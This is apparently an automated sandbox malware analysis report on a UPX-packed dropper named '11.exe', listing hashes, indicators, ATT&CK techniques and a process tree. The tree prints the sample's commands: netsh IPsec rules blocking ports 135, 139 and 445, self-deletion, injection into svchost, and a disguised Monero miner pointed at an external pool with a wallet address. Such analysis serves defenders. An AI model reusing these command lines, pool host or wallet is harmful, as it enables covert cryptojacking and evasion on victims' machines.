76005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306

General

Target

11.exe
Size

1.4MB
MD5

1fc1c860e86a8fbc2021d2567d62f703
SHA1

42ea2c9f4548614574dff36e019ae1cbc68b54e3
SHA256

76005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306
SHA512

fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c

Score

8^/10

persistence upx

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

wudfhosts.exe

pid process

3444 wudfhosts.exe
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
3444	wudfhosts.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Cursors\wudfhosts.exe	upx
C:\Windows\Cursors\WUDFhosts.exe	upx

Loads dropped DLL 1 IoCs

Processes:

svchost.exe

pid process

1556 svchost.exe

pid	process
1556	svchost.exe

Drops file in System32 directory 6 IoCs

Processes:

svchost.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	svchost.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\Update[1].txt	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 1556 set thread context of 2448 1556 svchost.exe svchost.exe

description	pid	process	target process
PID 1556 set thread context of 2448	1556	svchost.exe	svchost.exe

Drops file in Windows directory 5 IoCs

Processes:

11.exesvchost.exe

description	ioc	process
File created	C:\Windows\Help\active_desktop_render.dll	11.exe
File opened for modification	C:\Windows\Cursors\WUDFhosts.exe	11.exe
File created	C:\Windows\Cursors\WUDFhosts.exe	11.exe
File created	C:\Windows\Help\active_desktop_render_New.dll	svchost.exe
File opened for modification	C:\Windows\Help\active_desktop_render.dll	svchost.exe

Modifies data under HKEY_USERS 8 IoCs

Processes:

svchost.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

svchost.exe

pid	process
2448	svchost.exe
2448	svchost.exe
2448	svchost.exe
2448	svchost.exe
2448	svchost.exe
2448	svchost.exe
2448	svchost.exe
2448	svchost.exe
2448	svchost.exe
2448	svchost.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

svchost.exewudfhosts.exe

description	pid	process
Token: SeRestorePrivilege	2448	svchost.exe
Token: SeBackupPrivilege	2448	svchost.exe
Token: SeSecurityPrivilege	2448	svchost.exe
Token: SeTakeOwnershipPrivilege	2448	svchost.exe
Token: SeLockMemoryPrivilege	3444	wudfhosts.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

11.exesvchost.exesvchost.exe

pid process

2112 11.exe
1556 svchost.exe
2448 svchost.exe
2448 svchost.exe

pid	process
2112	11.exe
1556	svchost.exe
2448	svchost.exe
2448	svchost.exe

Suspicious use of WriteProcessMemory 48 IoCs

Processes:

11.exesvchost.exesvchost.exe

description	pid	process	target process
PID 2112 wrote to memory of 1168	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 1168	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 1168	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 2732	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 2732	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 2732	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 3176	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 3176	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 3176	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 2736	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 2736	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 2736	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 3372	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 3372	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 3372	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 3852	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 3852	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 3852	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 1272	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 1272	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 1272	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 752	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 752	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 752	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 740	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 740	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 740	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 1228	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 1228	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 1228	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 3164	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 3164	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 3164	2112	11.exe	netsh.exe
PID 2112 wrote to memory of 1364	2112	11.exe	cmd.exe
PID 2112 wrote to memory of 1364	2112	11.exe	cmd.exe
PID 2112 wrote to memory of 1364	2112	11.exe	cmd.exe
PID 1556 wrote to memory of 2448	1556	svchost.exe	svchost.exe
PID 1556 wrote to memory of 2448	1556	svchost.exe	svchost.exe
PID 1556 wrote to memory of 2448	1556	svchost.exe	svchost.exe
PID 1556 wrote to memory of 2448	1556	svchost.exe	svchost.exe
PID 1556 wrote to memory of 2448	1556	svchost.exe	svchost.exe
PID 1556 wrote to memory of 2448	1556	svchost.exe	svchost.exe
PID 1556 wrote to memory of 2448	1556	svchost.exe	svchost.exe
PID 1556 wrote to memory of 2448	1556	svchost.exe	svchost.exe
PID 1556 wrote to memory of 2448	1556	svchost.exe	svchost.exe
PID 1556 wrote to memory of 2448	1556	svchost.exe	svchost.exe
PID 2448 wrote to memory of 3444	2448	svchost.exe	wudfhosts.exe
PID 2448 wrote to memory of 3444	2448	svchost.exe	wudfhosts.exe

C:\Users\Admin\AppData\Local\Temp\11.exe
"C:\Users\Admin\AppData\Local\Temp\11.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2112

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=Block
2⤵
PID:1168

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=Filter1
2⤵
PID:2732

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
2⤵
PID:3176

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
2⤵
PID:2736

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
2⤵
PID:3372

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
2⤵
PID:3852

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
2⤵
PID:1272

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
2⤵
PID:752

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=FilteraAtion1 action=block
2⤵
PID:740

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
2⤵
PID:1228

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=Block assign=y
2⤵
PID:3164

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\11.exe"
2⤵
PID:1364

\??\c:\windows\syswow64\svchost.exe
c:\windows\syswow64\svchost.exe -k graphicsperf_svcsgroup -s GraphicsPerf_Svcs
1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1556

C:\Windows\SysWOW64\svchost.exe
C:\Windows\system32\svchost.exe
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2448

C:\Windows\Cursors\wudfhosts.exe
C:\Windows\Cursors\wudfhosts.exe -o xmr.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3444

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\Cursors\WUDFhosts.exe
MD5
4a72e30c0a582b082030adfd8345014f

SHA1
2f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353

SHA256
e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976

SHA512
8a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798

Download Submit
C:\Windows\Cursors\wudfhosts.exe
MD5
4a72e30c0a582b082030adfd8345014f

SHA1
2f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353

SHA256
e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976

SHA512
8a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798

Download Submit
\??\c:\windows\help\active_desktop_render.dll
MD5
14e2b194b652d4fd912404775a6ae898

SHA1
e93f529bb61e12c41426cb2b86176bf0af387c09

SHA256
24ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c

SHA512
b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6

Download Submit
\Windows\Help\active_desktop_render.dll
MD5
14e2b194b652d4fd912404775a6ae898

SHA1
e93f529bb61e12c41426cb2b86176bf0af387c09

SHA256
24ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c

SHA512
b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6

Download Submit
memory/740-122-0x0000000000000000-mapping.dmp

Download
memory/752-121-0x0000000000000000-mapping.dmp

Download
memory/1168-114-0x0000000000000000-mapping.dmp

Download
memory/1228-123-0x0000000000000000-mapping.dmp

Download
memory/1272-120-0x0000000000000000-mapping.dmp

Download
memory/1364-126-0x0000000000000000-mapping.dmp

Download
memory/2448-133-0x0000000010072B6D-mapping.dmp

Download
memory/2448-128-0x0000000010000000-0x000000001010C000-memory.dmp

Filesize
1.0MB

Download
memory/2448-131-0x0000000010000000-0x000000001010C000-memory.dmp

Filesize
1.0MB

Download
memory/2448-130-0x0000000010000000-0x000000001010C000-memory.dmp

Filesize
1.0MB

Download
memory/2448-136-0x0000000010000000-0x000000001010C000-memory.dmp

Filesize
1.0MB

Download
memory/2448-129-0x0000000010000000-0x000000001010C000-memory.dmp

Filesize
1.0MB

Download
memory/2732-115-0x0000000000000000-mapping.dmp

Download
memory/2736-117-0x0000000000000000-mapping.dmp

Download
memory/3164-124-0x0000000000000000-mapping.dmp

Download
memory/3176-116-0x0000000000000000-mapping.dmp

Download
memory/3372-118-0x0000000000000000-mapping.dmp

Download
memory/3444-138-0x0000000000000000-mapping.dmp

Download
memory/3444-140-0x000002612B900000-0x000002612B910000-memory.dmp

Filesize
64KB

Download
memory/3444-141-0x000002612B920000-0x000002612B930000-memory.dmp

Filesize
64KB

Download
memory/3444-143-0x000002612B930000-0x000002612B940000-memory.dmp

Filesize
64KB

Download
memory/3444-142-0x000002612B940000-0x000002612B950000-memory.dmp

Filesize
64KB

Download
memory/3852-119-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads